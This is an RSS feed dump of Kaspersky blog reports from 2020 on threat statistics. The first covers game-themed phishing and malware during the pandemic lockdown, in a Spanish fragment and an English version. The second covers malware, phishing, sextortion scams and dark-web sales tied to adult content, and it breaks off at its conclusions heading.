Veredicto % de todos los ataques
1 UDS: DangerousObject.Multi.Generic 8,5%
2 Worm.Win32.Fujack.cw 5,4%
3 PDM: Trojan.Win32.Generic 3,8%
4 HEUR: Trojan.Multi.StartPage. b 3,5%
5 PDM: Trojan.Win32.Bazon.a 3,5%
6 Trojan.WinLNK.Agent.ra 3,4 %
7 HEUR: Trojan.Win32.Generic 3,2 %
8 Email-Worm.Win32. Brontok.q 3,2 %
9 HEUR: Trojan.WinLNK.Agent.gen 2,7%
10 Trojan.WinLNK.Agent.rx 2,3%

Los datos estadísticos no toman en cuenta la categoría Hacktool de amenazas (son herramientas que suelen instalar los mismos usuarios pero que pueden usarse con fines maliciosos). En esta categoría incluimos clientes de acceso remoto, analizadores de tráfico, etc. Esta categoría reviste interés aquí ya que los modernos programas estafadores suelen usar las mismas técnicas que el malware, como la inyección en la memoria y la explotación de vulnerabilidades para evitar la detección. Si añadiéramos este tipo de detección a los datos, ocuparían el primer lugar con el 10%.

A juzgar por los datos obtenidos de nuestros antivirus web, los atacantes se enfocan preferentemente en el uso de programas mineros. The Witcher 3: Wild Hunt También ataca al TOP 3 de los juegos más explotados, cuya popularidad ha aumentado gracias a las series basadas en las novelas de Andrzej Sapkowski.

Cantidad de ataques que usan el tema de un juego en línea, enero-mayo 2020 Fuente: KSN (descargar)

Según la dinámica de las respuestas a los enlaces que contienen nombres de juegos, llegamos a la conclusión de que, entre abril y principios de mayo, los atacantes lanzaron una campaña en la que usaron varios juegos de forma simultánea. En particular, Overwatch y Players Unknown Battlegrounds fueron detectados por nuestro radar. Si miramos con detenimiento el gráfico, podemos ver muchos picos paralelos. Antes y después del periodo indicado, no persiste esta tendencia.

Ataques web que usan nombres de temas de Overwatch y PUBG, enero-mayo de 2020. Fuente: KSN (descargar)

Los usuarios en Vietnam son más susceptibles a ataques que usan temas relacionados con juegos: casi el 8% de todas las detecciones del antivirus web en este país ocurrieron en sitios cuyos nombres usaban temas de juegos.

TOP 20 de países por porcentaje de intentos bloqueados de ingresar a sitios maliciosos que usan temas de juegos de juegos en línea, enero-mayo 2020. Fuente: KSN

País Porcentaje de usuarios atacados
Vietnam 7,90%
Argelia 6,67%
Corea del Sur 6,23%
Hungría 6,20%
Rumanía 5,98%
Polonia 5,96 %
Egipto 5,20%
Portugal 4,84%
Malasia 4,75%
Grecia 4,56%
Filipinas 4,51%
Uzbekistán 4,48%
Túnez 4,41%
Marruecos 4,06%
Irak 3,82%
Brasil 3,61%
Italia 3,59%
Indonesia 3,54%
Birmania 3,52%
Francia 3,52%

Después de Vietnam, el TOP 5 de países en esta categoría incluye a Argelia, Corea, Hungría y Rumanía. En general, el TOP 20 incluye muchos países de África del Norte, Asia y Europa, especialmente del sur y del este.

Conclusión

Decenas de millones de personas que se encuentran confinadas en sus hogares (en combinación con mucho tiempo libre) han provocado un fuerte impulso a la industria de los juegos en línea. Por supuesto, los ciberpiratas no podían dejar de aprovechar esta nueva situación, por lo que hemos visto un impresionante aumento en los intentos de acceder a sitios de phishing que explotan los temas de juegos.

Sin embargo, debemos tener en cuenta que esto se ha visto facilitado no solo por los esfuerzos de los atacantes, sino también por las acciones descuidadas de los mismos usuarios, que son engañados por mensajes de correo aparentemente enviados en nombre de los servicios de juegos, o que buscaban versiones pirateadas de algunos juegos populares, o cayeron víctimas de programas estafadores.

Por desgracia, en la mayoría de los casos, los ciberpiratas no necesitan esquemas con sofisticada tecnología para lanzar ataques exitosos. Es suficiente recurrir a temas relevantes, uno de los cuales, en la primavera de 2020, fue el de los videojuegos.

Contributor:
Copyright:
Category: Destacados
Date: Wed, 17 Jun 2020 10:00:28 +0000
Local date: Wed, 17 Jun 2020 10:00:28 +0000
Latitude:
Longitude:
Language: es-ES
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: 1200 px
itemImageHeight: 800 px
Do cybercriminals play cyber games during quarantine?
Author: Maria Namestnikova
Link :
Email :
Description: Thanks to the coronavirus pandemic, the role of the Internet in our lives has undergone changes, including irreversible ones. We decided to take a closer look at the changes around us through the prism of information security, starting with the video game industry.
Full content:

Thanks to the coronavirus pandemic, the role of the Internet in our lives has undergone changes, including irreversible ones. Some of these changes are definitely for the better, some are not very good, but almost all of them in some way affect digital security issues.

We decided to take a closer look at the changes around us through the prism of information security, starting with the video game industry.

Key findings:

  • The daily number of blocked attempts to visit malicious gaming-related websites, or browse to such sites from gaming-related websites (or forums), increased by 54% in Aprilcompared to January of this year. In May, we saw a downward trend in this indicator: -18% compared to April.
  • The number of blocked attempts to visit phishing sites that exploit online gaming topics has increased. In particular, the number of notifications from fake Steam gaming platform sites increased by 40% from February to April.
  • Attackers use Minecraft, Counter-Strike: Global Offensive and The Witcher 3: Wild Hunt most often.
  • The users most targeted by such attacks are from Vietnam (7.9%), Algeria (6.6%), Korea (6.2%), Hungary (6.2%) and Romania (6%)

I play until the boss sees

Figures from various sources show that the pandemic has led to a sharp increase in player activity. In March, according to gamesindustry.biz, sales of games, both computer and console, increased significantly.

Growth in game sales in the week of March 16-22. Source: gamesindustry.biz (download)

In April, the number of downloads, as well as the number of simultaneous online players, of Steam reached record levels. The Steam user activity graph (both in-game and just installing the client) (Steam Database) shows the peak of activity on April 4. After that, activity started to reduce, but only slowly. Moreover, the activity graphs of the players are noticeably different from the usual ones – periods of inactivity are less pronounced than in ordinary pre-quarantine days, and the peaks last longer.

The number of Steam users per day. Source: steamdb.info

All these stats are totally understandable. First, people have more free time for games. Statistics collected by Nielsen Games as part of their regular survey of gamers confirms this thesis:

The increase in the amount of time spent playing video games by players in different countries. Source: Hollywood Reporter (download)

Second, apparently not all people who wanted to spend time playing video games had a computer at home that would let them do it. That’s what you can figure out checking out the hardware statistics displayed on the Steam site.

If you look closely at the graphics containing information on the video cards used by Steam users, you can see a clear change in graphics cards, which were completely flat before, occurring in March 2020. Until now, the proportions of Nvidia, Intel and AMD video cards have remained at the same level relative to each other. Since the beginning of quarantine, the share of Intel and AMD video cards has grown quite noticeably. This growth was within 2%, which might seem insignificant, until you remember that there are more than 20 million Steam users. That is, the additional number of devices with Intel and AMD graphics cards amounted to hundreds of thousands of computers. Given the specifics of video cards from different manufacturers, we can safely assume that these hundreds of thousands of devices are office laptops that arrived at home during quarantine and that people installed Steam while the boss wasn’t able to see it anyway.

Source: steampowered.com

This is also confirmed by the sudden  in the graphs showing the ratio of Intel and AMD processors (Intel also grew from the beginning of quarantine); and the processors used by players in terms of the number of cores (atypical growth in this proportion was shown by 4-core and 2-core processors) :

Source: steampowered.com

Let’s play with the bad guys?

The increase in the number of players and the time they spend in games, of course, did not go unnoticed by cybercriminals. Gamers have long been the target of attacks by bad guys, who are mainly interested in logins and passwords for game accounts. Now, with the connection of work computers to home networks, and, conversely, with the entry of home devices into work networks that are often poorly prepared for this, attacks on players are becoming not only a way to get to an individual user’s wallet, but also a way to access the corporate infrastructure.

In the first five months of 2020, the number of vulnerabilities discovered on Steam has already exceeded the number of vulnerabilities discovered in any of the previous years. This fact, among other things, indicates a growing interest in finding such vulnerabilities.

Source: cve.mitre.org (download)

We shouldn’t forget also that at the end of April 2020, Valve confirmed the leak of the source code of the popular network games CS: GO and Team Fortress 2. Attackers are most probably already trying to parse their code in search of vulnerabilities that can be used for their own purposes. It is important to understand that these are not offline games, but online games that need a constant connection to game servers and frequent updates. This makes their users even more vulnerable, because their devices are obviously always online, and players are always ready to install an “update” so as not to lose the ability to play.

But even without technically complex attacks using zero-day vulnerabilities, attackers have a large field for their activities. Realizing that the gaming industry is experiencing an unexpected increase in the number of players, they have “increased power” in the field of attacks that exploit the gaming theme in one way or another.

The logical step on the part of the attackers was to increase the number of phishing attacks. This is confirmed by Kaspersky AntiPhishing and the Kaspersky Security Network (KSN). By comparison with February, the number of hits on the thousand most popular phishing sites containing the word “Steam” in the name has significantly increased. Such triggering peaked in April.

An increase in the number of hits on phishing Steam-related topics relative to February 2020. Source: Kaspersky Security Network (download)

There is a clear increase in the statistics of web antivirus detections of sites with names exploiting the game theme as a whole, for example, containing the names of popular video games and gaming platforms.

The number of web attacks using game subjects during the period from January to May 2020. Source: KSN (download)

A wide variety of malicious programs are spread with such malicious links: from password stealing malware to ransomware and miners. As always, they fake free versions, updates or extensions for popular games, as well as cheat programs. A similar picture is observed among malicious files that use game-related names to stay unnoticed.

Local threats that use game-related themes as a cover 

Verdict % of all attacks
1 UDS: DangerousObject.Multi.Generic 8.5%
2 Worm.Win32.Fujack.cw 5.4%
3 PDM: Trojan.Win32.Generic 3.8%
4 HEUR: Trojan.Multi.StartPage. b 3.5%
5 PDM: Trojan.Win32.Bazon.a 3.5%
6 Trojan.WinLNK.Agent.ra 3.4%
7 HEUR: Trojan.Win32.Generic 3.2%
8 Email-Worm.Win32. Brontok.q 3.2%
9 HEUR: Trojan.WinLNK.Agent.gen 2.7%
10 Trojan.WinLNK.Agent.rx 2.3%

The statistics do not take into account the Hacktool category of threats – tools that are usually installed by the users themselves but can be used for malicious purposes. We include remote access clients, traffic analyzers, etc. in this category. This category is of interest here because modern cheat programs often use the same techniques as malware, such as memory injection and exploiting vulnerabilities to bypass protection. If we add this kind of detection to the statistics, it will take first place with a share of 10%.

Judging by the statistics obtained from our web antivirus, the attackers focus the most on Minecraft usage. The Witcher 3: Wild Hunt also hits the TOP 3 of the most exploited games, the popularity of which has grown sharply thanks to the series based on the novels by Andrzej Sapkowski.

The number of attacks using the theme of an online game, January-May 2020. Source: KSN (download)

 Following the dynamics of the responses to the links containing the names of the games, we came to the conclusion that from April to early May, the attackers conducted a campaign in which they used several games at once. In particular, Overwatch and Players Unknown Battlegrounds came into the view of our radar. If you look closely at the graph, you can see many parallel peaks. Before and after the indicated period, this trend does not persist.

Web attacks using the themes of Overwatch and PUBG, January-May 2020. Source: KSN (download)

Users in Vietnam are most susceptible to attacks using game-related topics: almost 8% of all web antivirus detections in this country occurred on sites whose names used the theme of games.

TOP 20 countries by the proportion of blocked attempts to enter malicious sites using the theme of online games, January-May 2020. Source: KSN

Country Percentage of attacked users
Vietnam 7.90%
Algeria 6.67%
South Korea 6.23%
Hungary 6.20%
Romania 5.98%
Poland 5.96%
Egypt 5.20%
Portugal 4.84%
Malaysia 4.75%
Greece 4.56%
Philippines 4.51%
Uzbekistan 4.48%
Tunisia 4.41%
Morocco 4.06%
Iraq 3.82%
Brazil 3.61%
Italy 3.59%
Indonesia 3.54%
Myanmar 3.52%
France 3.52%

Following Vietnam, the TOP 5 countries for this parameter include Algeria, Korea, Hungary and Romania. In general, the TOP 20 includes many countries in North Africa, Asia and Europe, especially Southern and Eastern Europe.

Conclusion

Tens of millions of people who find themselves isolated at home (combined with plenty of free time) have given a serious boost to the gaming industry. Of course, the attackers could not help but take advantage of this situation and we have seen an impressive increase in attempts to switch to phishing sites that exploit gaming topics.

However, we should keep in mind that this was facilitated not only by the efforts of attackers, but also by the careless actions of the users themselves, who fell for fake emails apparently sent on behalf of game services, or who were looking for hacked versions of some popular games and cheat programs for others.

Unfortunately, in most cases, cybercriminals do not need technologically sophisticated schemes to carry out successful attacks. It is enough to use relevant topics, one of which in the spring of 2020 was video games.

Contributor:
Copyright:
Category: Featured
Date: Wed, 17 Jun 2020 10:00:24 +0000
Local date: Wed, 17 Jun 2020 10:00:24 +0000
Latitude:
Longitude:
Language: en-US
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: 1200 px
itemImageHeight: 800 px
Explicit content and cyberthreats: 2019 report
Author: Kaspersky
Link :
Email :
Description: Over the past two years we have reviewed how adult content has been used to spread malware and abuse users' privacy. This is a trend that's unlikely to go away, especially under current circumstances. While many pornography platforms are enjoying an influx of new users and providing legitimate and safe services, the security risks remain, if not increase.
Full content:

‘Stay at home’ is the new motto for 2020 and it has entailed many changes to our daily lives, most importantly, in terms of our digital content consumption. With users opting to entertain themselves online, malicious activity has grown. Over the past two years we have reviewed how adult content has been used to spread malware and abuse users’ privacy. This is a trend that’s unlikely to go away, especially under current circumstances. While many pornography platforms are enjoying an influx of new users and providing legitimate and safe services, the security risks remain, if not increase.

One of the key concerns that arises when it comes to adult content is the risk to privacy. Every passing year shows privacy is becoming an ever scarcer resource, with mobile devices becoming a popular new infection point. With data leaks happening more frequently than ever, abuse of privacy and its value has yet again become a popular topic of discussion, and a point of concern for many users who may have previously overlooked the issue altogether. The new reality shows this threat is real and quite tangible. Agreeing to a social contract that entails giving up your data in exchange for services, is now widely accepted in our society. It is, however, a completely different story if the data you had no intention of sharing ends up in the open. A situation like that can have devastating consequences and even put lives at risk. Our sexual preferences and sex life most probably top the list of things that we as a society still prefer to keep private, with 28% of users believing porn-related searches must be kept private. However, cybercriminals seem to think otherwise.

Recent news about data leaks relating to pornography confirm the trend. The OnlyFans leak of adult content created by sex workers, which is not only a source of income for them but also information that they did not choose to share publicly, is just one notable incident. This and other examples demonstrate how leaks lead to personal lives being violated, why it is harmful and may even be dangerous. The leak of over 1.195 million users’ personal information from a hentai pornography site is yet another example of how data not meant to be in any way exposed publicly was abused, putting numerous users at risk. Such incidents are happening more and more frequently, and the fault of the organizations that handle such data cannot be overlooked – too often user data is unsecured and unencrypted, despite being a tempting target for cybercriminals looking to make money.

But, of course, there’s more to it than that. To understand which threats await viewers of adult content we conducted the following research.

Methodology and key findings

To understand the risks that may be associated with pornographic content online, we researched several types of threats. We evaluated mobile and PC-focused malware disguised as adult content to see what kind of files users might be downloading and thus putting themselves at risks. We tested whether and to what extent violent content and adult dating apps are used by cybercriminals as a disguise for malware distribution. We examined the privacy aspect of adult content consumption and dangers associated with privacy breaches – from malware hunting for credentials to pornographic websites, to what kind of sex-related content gets leaked into the dark web. We also analyzed phishing and spam linked to porn and sex dating to see what kind of content users should be wary of. Using Kaspersky Security Network – the infrastructure dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world – we measured the number and type of threats users have encountered in recent years.

Additionally, we dived into underground online markets and learnt what kind of sex-related personal data is for sale and what kind of scams are discussed among the cybercriminal fraternity.

As a result, we discovered the following:

  • Mobile porn-related threats are growing, while PC-focused malware and potentially unwanted applications are becoming less appealing to cybercriminals. The number of mobile users attacked more than doubled from 19,699 in 2018 to 42,973 in 2019. By contrast, there was a drop in PC-based threats from
  • Cybercriminals strive for more flexibility when it comes to choosing the kind of malware to distribute – almost two out of every five users attacked by porn-related PC threats have been hit by Trojan-Downloaders (39.6%) that enable other types of malware to be installed later.
  • The number of users attacked by malware hunting for credentials to access pornography websites has dropped, while the number of the malware attacks continues to grow, increasing by 37% from 2018 to 2019 and reaching a total of 1,169,153 in 2019. This demonstrates the persistence of botnets in attacking the same users – a radically different picture to 2018.
  • Privacy becomes an even bigger concern for users when it comes to adult content. Things like leaked personal images and stolen premium subscriptions for pornography sites remain in high demand, with the theme of sex continuing to be used by cybercriminals as an easy way to make money.

PC threats

Malware is spread through the web – disguised as software updates or files, it is distributed across numerous websites all over the digital space. The distribution system is vital for malware. In the past, ‘black SEO‘ – a technique that enabled malicious sites to appear higher up in search results – was the most prevalent, but now that search engines have taken effective steps to hinder it, cybercriminals have turned to other channels.

Malicious software is often distributed via an affiliate network of websites that share pornographic content (we looked into a similar case, though on a less carnal theme, in one of our recent reports on Shlayer Trojan). Moreover, these websites can be created by cybercriminals using template pornographic websites – such services are freely available and their main aim is to create a source of income for the owners from advertising. With control of the content on a website where sextortion malware is distributed, cybercriminals can narrow down the victims to their target audience.

Legitimate websites can also be a source of threats, often unknowingly, with malicious links placed in the comments sections or through the use of malvertising. While the most popular online porn websites are well protected and rarely become a source of malware, this is not necessarily the case for many others. All in all, this shows that downloading anything from the web always comes with risks that have to be considered by any user.

Porn tags = malware tags

Pretty much any content that is in demand can be used as bait by cybercriminals, and this is especially true when it comes to online entertainment. Our previous research has shown that the best way to deliver infected files to victims’ devices is to disguise them as something that they are actually looking for. In the case of adult content, using porn tags has proven to be a popular method. ‘Porn tag’ is a term used to categorize the pornographic video genre. Each porn website has a dedicated page with porn tags and the number of videos available with these tags, reflecting the popularity of the content.

Previously, to determine how prevalent threats disguised as pornographic content were, we analyzed the 100 most popular tags. This showed a correlation between the popularity of porn tags and infected files under the guise of adult content – most malware is distributed under the guise of just a few of the most popular tags. This means it’s not necessary to analyze all 100 tags to understand the threat landscape. This year we limited the analysis to the 10 most popular tags – these we ran against our database of threats and Kaspersky telemetry. We selected the most popular tags based on information from the top three most visited porn websites, choosing those with the most videos uploaded.

The comparison between results for 2018 and 2019 showed that the number of users attacked by this threat has decreased, from 135,780 to 106,928, as did the number of attacks – from 148,419 to 108,973. This, however, does not signal that the threat has become less significant. The results showed a wide variety of files infected both by malware and not-a-virus threats – these included RiskTools, Adware and Downloaders. In fact, in 2019, 473 families of malware and not-a-virus threats belonging to 32 varieties were spread, slightly less than 2018 with 527 families and 30 varieties.

Unique files distributed, the number of users affected and the number of detections of malicious files masked as adult content for PCs in 2018 and 2019. Source: Kaspersky Security Network (download)

Looking at the threats that attacked most users, we see a growth in the share of Trojan-Downloaders – a type of malicious software capable of downloading any other software after installation of the Trojan on a device. Two out of every five users (39%) that downloaded malware under the guise of porn-related content were attacked by this threat. Trojan-Downloaders enable attackers to adapt their strategy and target infected users with whichever malware they deem most effective and profitable.

Once launched, the Trojan-Downloader.Win32.Autoit.vzu distracts the user with the desired video while simultaneously trying to covertly download and launch another malicious file on the infected device

Other types of Trojans are also a popular choice for cybercriminals, followed by not-a-virus threats such as Downloaders and Adware. It’s important to note that Trojan-Ransom and Backdoors, relatively dangerous threats, still remain in the top 10. These threats have been decreasing for a while, but we see that they have not been rendered obsolete. In particular, ransomware that spreads via porn-related docs is more likely to be targeted activity focused on users that view illicit content and wouldn’t want anyone to find out about it.

Top 10 classes of threat that went under the guise of porn-related categories by the number of attacked users in 2018 and 2019. Source: Kaspersky Security Network (download)

A closer look at the most popular detection names demonstrates that the difference between the most prevalent threats in 2018 and 2019 is very minor. Downloaders became even more popular due to their aforementioned flexibility, accounting for six of the top 10 detections in 2019. Adware and not-a-virus Downloaders also remained widespread.

Top 10 detection names for threats disguised as porn-related content, by the number of attacked PC users, in 2018 and 2019. Source: Kaspersky Security Network (download)

Credential hunters

In the digital age, virtually anyone is at risk of losing personal information, particularly valuable credentials. In order to automate the gathering of this information, cybercriminals use credential hunters – a type of malware, whose purpose is to steal login information from various websites and services. We track this sort of malware using our botnet-tracking technology, which enables monitoring of active botnets, gathers intelligence and prevents emerging threats.

Once installed on a PC, this malware can monitor web pages that are opened or create fake ones prompting the user to enter their login and password credentials. This technique is most often used for stealing banking details, though porn sites have not been immune to this malicious activity either.

The dynamics of botnet activity in relation to porn content over the past three years shows a curious tendency – it drew more interest from various groups in 2018, but started declining in 2019, even though the overall number of attacks continued to grow. This is reflected both by a significant decline in the number of users affected by botnets that stole porn accounts in 2019, as well as a decrease in the variety of botnets used to hunt for credentials. For instance, in 2017 only three malware families hunted for porn-related accounts; in 2018 the number grew to five families, while in 2019 it dropped to just one named Ramnit. This further confirms that at some point in 2018 more actors engaged in stealing password credentials from porn sites, but for some reason their interest waned in 2019.

The number of attacked users and detections of attacks by botnets hunting premium porn accounts, 2017-2019. Source: Kaspersky Security Network (download)

The number of sites affected in 2019 remained the same as the previous year – pornhub.com and xvideos.com, both among the top three most visited porn sites according to similarweb.com statistics in 2020, were targeted in 2019. As attacks consolidated into the activity of just one family, the number of users affected also dropped by 65% from 110,000 in 2018 to 38,846 in 2019. Nevertheless, the number of attacks continued to grow, increasing by 37% from 2018 to 2019 and reaching a total of 1,169,153 attacks, showing the persistence of botnets in attacking the same users.

Overall, we can conclude that even though less cybercriminals demonstrated an interest in credential hunting from porn sites, the threat is still real and focused only on the most visited sites, reflecting the cybercriminals’ understanding of potential demand for credentials on the black market.

Mobile threats

To learn more about mobile threats related to illicit content, we checked all files disguised as porn videos or adult-content installation packages for Android in 2018 and 2019. While we still used porn tags as a filtering criterion – as we did for the analysis of PC-based threats – the methodology was slightly different. We ran 200 popular porn tags against our database of threats in order to gain the fullest insight into porn-related mobile threats. The analysis showed results for 105 tags in 2018 and for 99 tags in 2019, demonstrating that not all porn attracts cybercriminals. Even though less tags were used to spread malicious files disguised as porn, in 2019 the number of users attacked by porn-related malware and not-a-virus threats grew two-fold, reaching 42,973 compared to 19,699 users attacked in 2018.

We also separately ran 40 ‘violent’ porn tags against the same database of detections on Android devices. The violent category included a variety of tags associated with sexual violence against another person. The hypothesis was that more unusual porn tags might demonstrate a disproportionally higher level of malicious activity. However, the results showed that these tags are hardly used for spreading malware, with 270 and 133 attacked users in 2018 and 2019 respectively.

Analysis of the types of threats distributed via such porn-related files demonstrated a slight growth in their variety – in 2018 we found 180 malware and not-a-virus threat families belonging to 20 classes of threats, while in 2019 the numbers were 203 and 20 respectively. Adware, software that’s used to show and redirect users to unwanted advertising pages, remained in first place in terms of variety, with a fifth (19%) of malicious files being AdWare installers. Not-a-virus: RiskTools and Trojans remained among the top three types of threat both in 2018 and 2019, even though their proportions have changed slightly.

Top 10 types of mobile threat that make up the variety of porn-related categories, in 2018 and 2019. Source: Kaspersky Security Network (download)

The proportion of Trojan-Bankers, which hunt for banking cards and other payment credentials, dropped from 7% to 5%. Overall, however, we can see that the types of threat distributed under the guise of adult content has hardly changed in terms of variety.

Looking deeper into the types of threats and how widespread they are, we can see that most users have been targeted by adware detected as AdWare.AndroidOS.Agent.f. This was true for 2018 when 39.23% of attacked users were targeted by this threat, and for 2019 with 35.18% of users attacked by it. Furthermore, six of the top 10 porn-related threats for mobile users were adware in 2018 and seven in 2019. This further confirms that the popularity of adware continues to grow.

Top 10 detection names that represent porn-related categories, by the number of attacked mobile users in 2018 and 2019. Source: Kaspersky Security Network (download)

This type of threat is typically distributed through various affiliate programs whose purpose is to earn money per installation or per download of malicious applications by victims, a method we mentioned in earlier sections.

Overall analysis of the prominence of various types of threats shows that although downloading porn-related content from untrustworthy sources typically leads to infection with adware, more serious threats, including backdoors, spyware and ransomware, can still end up on the devices of unwitting users.

Although adult dating is a topic of interest for cybercriminals (see the Phishing and spam section), creating malicious applications that pretend to be sex dating apps doesn’t appear to be worth the effort. This year we analyzed a variety of threats distributed under the guise of popular sex dating applications. Sex dating apps, unlike regular dating apps, are focused on finding a date for a sexual encounter, meaning such apps have a much clearer targeted audience.

We were interested in seeing whether cybercriminals use popular brand names of sex dating apps in order to distribute malware or not-a-virus threats. The number of attacked users, however, turned out to be miniscule – just 32 over the whole of 2019. This is many times less compared to regular dating apps such as Bumble or Tinder, thus proving that malicious files under the guise of sex dating apps are rarely a source of threat to users. This could be due to the fact that downloading such apps involves greater privacy concerns and is therefore carried out with more attention to the legitimacy of the resource.

Our research found that malicious samples of apps used the names of the following brands: Grindr, Down Dating and Tingle. It’s important to note that the malicious software is no connected in any way to the actual sex dating apps and only uses their brand name to trick users.

Detection name %
not-a-virus:UDS:AdWare.AndroidOS.MobiDash.z 55,17%
not-a-virus:HEUR:AdWare.AndroidOS.MobiDash.z 51,72%
HEUR:Trojan.AndroidOS.Hiddapp.ch 10,34%
HEUR:Trojan.AndroidOS.Hiddapp.cg 6,90%
not-a-virus:HEUR:AdWare.AndroidOS.Mobidash.aj 6,90%

 Top 5 detection names for mobile threats pretending to be adult dating apps in 2019. Source: Kaspersky Security Network

Phishing and spam

Phishers and spammers are also not averse to using the porn theme. Our content-filtering technologies give us an insight into the kind of porn-related spam and phishing that users are targeted with, as well as enabling us to protect those users.

It’s important to note that the phishing versions of websites are not connected to the original platforms in any way. Cybercriminals copy the websites, often replicating them down to the smallest detail, making it hard for an unwitting user to tell a phishing page from an original. To make the websites appear as trustworthy as possible, fraudsters usually opt to copy the most popular platforms that are widely recognized by users, such as Pornhub.com, XNXX.com and several others. Such phishing websites are generally blocked by search engines and are therefore usually reached via phishing or spam emails, malware or malicious frames redirecting users to compromised websites or malvertising.

The most common goal of these phishing pages is to gather the personal information of users – their credentials and contact details, which can later be sold or used for malicious purposes. Certain websites employ social media authorization for access to the website – this is done to confirm that a user is over 18. Cybercriminals replicate these authorization pages, so they can get their hands on users’ social media credentials when then log in.

This phishing page replicates the authorization page to Pornhub through a popular social network. Once a user logs in, their social media credentials are stolen by the fraudsters

Pornographic phishing pages are also used to spread malware – once a user starts playing a video, they receive a notification that a video player update is required. The downloaded program, however, is in fact malware.

This phishing copy of the popular XNXX.com site mimics the legitimate website’s homepage and is practically impossible to differentiate from the original

Other phishing schemes target e-wallets and credit card credentials. In such cases the victim is lured to pornographic websites to watch a video that is only accessible if the user registers and provides their payment details.

Spam scam

For a few years we didn’t see much activity in terms of pornographic or sex-related content in spam, but then in 2019 the situation changed. Spam emails usually don’t focus on promoting pornographic content as such, but they are used to lure users to phishing sites using social engineering techniques, extort money or simply to advertise sites with explicit content.

The most common type of spam is that focusing on sex dating. Users receive emails allegedly from lonely ladies who invite them to chat on a website. The user is then directed to a new sex dating website with bots pretending to be attractive women, who then coax money from the victims for various content, such as erotic photos or premium access to the website. Cybercriminals also ask users to share their credit card data in order to ‘confirm their age’. Needless to say, this credit card data will later be used or resold on black market forums.

Emails dedicated to sex dating can either look like advertising or messages sent directly from women

This sex dating app interface shows various dialogues from bots pretending to be attractive women

Users are asked to share their credit card details that will be used to activate an allegedly free membership on the site

We have also seen the spread of spam promoting web porn games, with samples of emails advertising platforms where users can play 18+ games, such as 3D porn arcades, and watch explicit content that actually does lead to genuine websites. The main purpose of these spam emails is to advertise the availability of such content.

The email above advertises a website hosting 3D porn games

One of the darkest and possibly most harmful types of sex-related spam is blackmail or ‘sextortion scams’, which have been used by cybercriminals for over three years. We saw the rise of such emails in 2018 with the email content becoming more and more sophisticated. The trend continued in 2019, with new variations of the scams popping up across the web.

The scheme usually works as follows: users receive emails from scammers that claim to have hacked their computers and recorded them watching porn. The emails claim that the threat actor has contact information for friends and family as well as the social media credentials of the users that the actor will use to spread a video of the victim recorded via webcam. The cybercriminal also lists the technologies he allegedly used to gather information about the user to make the email sound more convincing.

In order to lend further legitimacy, the extortionist will claim to have personal information about the user, for instance, their password. The scammer may even cite a password that is allegedly used by the victim. For this purpose, cybercriminals often make use of databases purchased on the dark web. Because users often have the same passwords for different websites, it can be easy to convince victims that their devices have been compromised, even if the password doesn’t match a specific account. Having scared the victim into believing their reputation could be ruined, the scammers demand payment in bitcoin and even provide basic instructions on how to transfer the money.

This sextortion email demonstrates how cybercriminals try to convince a victim that they have been hacked

Last year the industry also saw variations of these scams: emails were distributed in a different language and the bitcoin number was split in two, so that detection systems wouldn’t identify it as spam. Another social engineering trick – convincing the victim that the girlfriend of one of his friends was compromised and blackmailed, but refused to pay – prompts the user out of sheer curiosity to click on malicious attachments in the emails that then download malware. This shows that the cybercriminals continue to adapt their schemes, taking into account developments in security measures and user behavior.

The dark web and beyond – a peek into the market behind the curtain

The dark web is the go-to place when it comes to understanding how the cybercriminal market operates. Various forums are used for the sale of malware, personal data, and the exchange of knowledge, often, quite practical. They also reflect the market value of stolen personal data. The sale of data is like any other business and the way it is organized resembles regular marketplaces, with guarantees from the sellers, a variety of choice and competitive pricing.

An example of a post made in 2019 on a forum offering stolen accounts for a very low price and providing pricing recommendations for resale

Premium adult website accounts, which we addressed in the Credential hunters section of this report, end up on dark web marketplaces where they are sold both in bulk and individually at low prices – starting from as little as US$0.50 per account. The accounts are usually resold at surface web platforms for up to US$5-10, with sellers even recommending prices for the resale of individual accounts. Furthermore, the buyers of stolen accounts often get a lifetime guarantee that the accounts will continue to work and remain accessible, with an option to replace those that become unavailable. The examples below demonstrate how widespread this practice is – on one forum alone we saw 210 offers of stolen accounts.

An example of an illegal forum that contains 210 offers of porn-related accounts for sale

Stolen accounts, somewhat ironically, are often purchased by individuals who care about their privacy and don’t want their personal information such as credit card data or email addresses revealed. Buyers often pay with cryptocurrency, thus remaining completely anonymous.

An example of an advertisement selling stolen Pornhub premium accounts on a regular forum for a low price. Buyers are offered discounts for buying in bulk

Premium porn site accounts are not the only adult content sold on the dark web and illegal forums on the surface web. A glimpse into the dark web market showed the twists and turns a data leak can take when the exposed content is sensitive. In the past year we have seen numerous cases of private adult content sites leaking content created by webcam models, along with their personal details, devastating the victims. But the creators of adult content are not the only ones at risk. While celebrities are the intended targets of such leaks, regular users may also see their private images end up on the web.

While databases of nude images are often available for free (with a donation-based support system for the publisher), some adult image content, including leaked personal images, is sold, albeit quite cheap – for as little as US$2.00 for a collection. This is the price tag cybercriminals put on the private lives of thousands of individuals, underlining a disturbing tendency that places little value on users’ personal data.

This screenshot showcases collections of nude images, both leaked and collected, sold for as low as US$2.00 per collection

This website offers to download sex tapes and nude content of various celebrities for free

Another disturbing trend that we have seen on the dark market is the extension of malware-as-a-service concept, with ready-to-use packages of content and instructions created for fraud. While in the past hackers may have exchanged information on how to trick users or skim cards, now some offer their expertise in other fields, including money extortion from victims interested in sex or simply human attention, albeit intimate.

For instance, in the example below a user offers a full sextortion package with instructions for new users. The package has been created for fooling users into believing they are talking to a real girl and as a result extorting money from them. It not only includes images and videos of a supposed model, which certainly lends more credibility to the trick, it also contains instructions on how to use it to make money – according to the ad, suitable “both for experienced and beginner user”. As a bonus the seller offers access to various porn accounts and certain gifts, and on top of that, shares information about fraud tutorials that the seller has created.

An example of an extortion package sold on the dark market

The seller goes as far as describing the value of his package and providing tutorials on how to use his product

We have seen blog posts where cybercriminals share their experience of creating and distributing various malware, including sextortion ransomware. For instance, one of them described a process for creating and distributing mobile ransomware focused on sextortion. An app would use a frontal camera to take a picture of a user and, accusing one of watching illicit content, would threaten to distribute the user’s photograph along with screenshots of the content they were watching unless the victim pays. Sound familiar? That’s because the method has been around for years, and is unlikely to go away – as long as there are unprotected and vulnerable users, there will always be someone taking advantage.

Conclusions and advice

